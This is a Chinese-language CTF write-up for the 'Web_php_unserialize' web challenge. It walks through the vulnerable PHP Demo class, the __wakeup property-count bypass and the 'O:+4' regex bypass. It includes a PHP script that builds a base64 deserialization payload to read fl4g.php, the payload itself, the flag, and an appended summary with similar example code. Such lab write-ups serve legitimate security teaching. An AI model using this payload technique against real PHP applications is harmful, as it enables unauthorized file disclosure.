攻防世界-Web_php_unserialize详解

本文深入探讨PHP反序列化漏洞原理,解析如何利用构造特殊序列化字符串绕过wakeup函数与正则过滤,实现目标文件泄露。文章通过具体代码示例,详细展示了绕过技巧与实践步骤。

Web_php_unserialize

源码:

<?php 
class Demo {           //定义一个类
    private $file = 'index.php';			//变量属性
    public function __construct($file) {      //类方法
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 		//wakeup函数 返回index.php所以必须绕过次函数
            //the secret is in the fl4g.php     //flag所在文件
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) {        		 //判断是否传入参数
    $var = base64_decode($_GET['var']);  	//对传入参数进行base64加密
    if (preg_match('/[oc]:\d+:/i', $var)) { //正则检查
        die('stop hacking!'); 
    } else {
        @unserialize($var);      //进行反序列化
    } 
} else { 
    highlight_file("index.php"); 	//返回想要结果
} 
?>

要想返回fl4g.php 必须满足3个条件:

1 要绕过wake up 函数

__wakeup()
是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。

绕过:
__wakeup()函数漏洞就是与对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数,如果该数字大于真实属性个数,就会绕过__wakeup()函数。

2 要绕过正则表达式

(preg_match(’/[oc]:\d+:/i’, $var))
而正则匹配的规则是: 在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 , 那么就被过滤 .很明显 , 因为 serialize() 的参数为 object ,因此参数类型肯定为对象 " O " , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 " O:4 " 这样的字符串肯定无法通过正则匹配
绕过
而O:+4没被过滤说明绕过了过滤而且最后的值不变。

3 必须是base64加密

这个简单我们直接对序列化的内容进行加密

编写php脚本

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$A = new Demo ('fl4g.php');					//创建对象
$C = serialize($A);                     //对对象A进行序列化
$C = str_replace('O:4','O:+4',$C);      //绕过正则表达式过滤
$C = str_replace(':1:',':2:',$C); 		//wakeup绕过
var_dump($C);
var_dump(base64_encode($C));            //base64加密

?>

运行结果
在这里插入图片描述

"O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}" string(68) 
"TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==" 

在这里插入图片描述
flag:
flag=“ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}”;

### 解题思路 在Web_php_unserialize题目中,题目的代码会对传入的反序列化字符串进行一些检查和处理 [^2]。代码首先定义了一个名为Demo的,包含私有变量$file和__construct()、__destruct()、__wakeup()三个魔术方法。__wakeup()方法会检查$file变量,若不等于index.php则将其重置为index.php,以此防止攻击者读取fl4g.php文件内容 [^2]。 当用户通过GET方式传入var参数时,代码会对其进行base64解码,接着使用正则表达式`/[oc]:\d+:/i`检查解码后的字符串,若匹配则阻止攻击,若不匹配则进行反序列化操作 [^2]。 为了解题,可构造一个Demo的对象并序列化,然后对序列化字符串进行修改。将`O:4`替换为`O:+4`,` :1:`替换为` :2:`,绕过__wakeup()方法的检查,再对修改后的字符串进行base64编码,最后将编码后的字符串作为var参数的值传入URL,从而读取fl4g.php文件内容 [^2][^3]。 ### 相关知识点 - **序列化与反序列化**:序列化是将对象的状态信息转换为可以存储或传输的形式的过程,反序列化则是将序列化的数据恢复为对象的过程。在PHP中,使用`serialize()`函数进行序列化,使用`unserialize()`函数进行反序列化 [^1][^2][^3][^4]。 - **魔术方法**: - `__construct()`:在创建对象时自动调用,用于初始化对象的属性 [^2]。 - `__destruct()`:在对象被销毁或脚本结束时自动调用,可用于执行一些清理操作,如关闭文件、释放资源等 [^2][^4]。 - `__wakeup()`:在反序列化时自动调用,可用于对对象的属性进行一些初始化或检查操作 [^1][^2][^4]。 - **正则表达式匹配**:使用`preg_match()`函数执行正则表达式匹配,可用于检查字符串是否符合特定的模式。在本题中,使用正则表达式`/[oc]:\d+:/i`检查反序列化字符串是否包含特定模式,若匹配则阻止攻击 [^2]。 - **字符串替换**:使用`str_replace()`函数进行字符串替换操作,可用于修改序列化字符串,绕过__wakeup()方法的检查 [^3]。 - **Base64编码与解码**:使用`base64_encode()`函数对字符串进行Base64编码,使用`base64_decode()`函数对Base64编码的字符串进行解码 [^2][^3][^4]。 ### 示例代码 ```php <?php class Demo { private $file = 'fl4g.php'; } $a = new Demo(); $b = serialize($a); echo $b; $b = str_replace('O:4', 'O:+4', $b); $b = str_replace(':1:', ':2:', $b); $b = base64_encode($b); echo $b; ?> ```
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值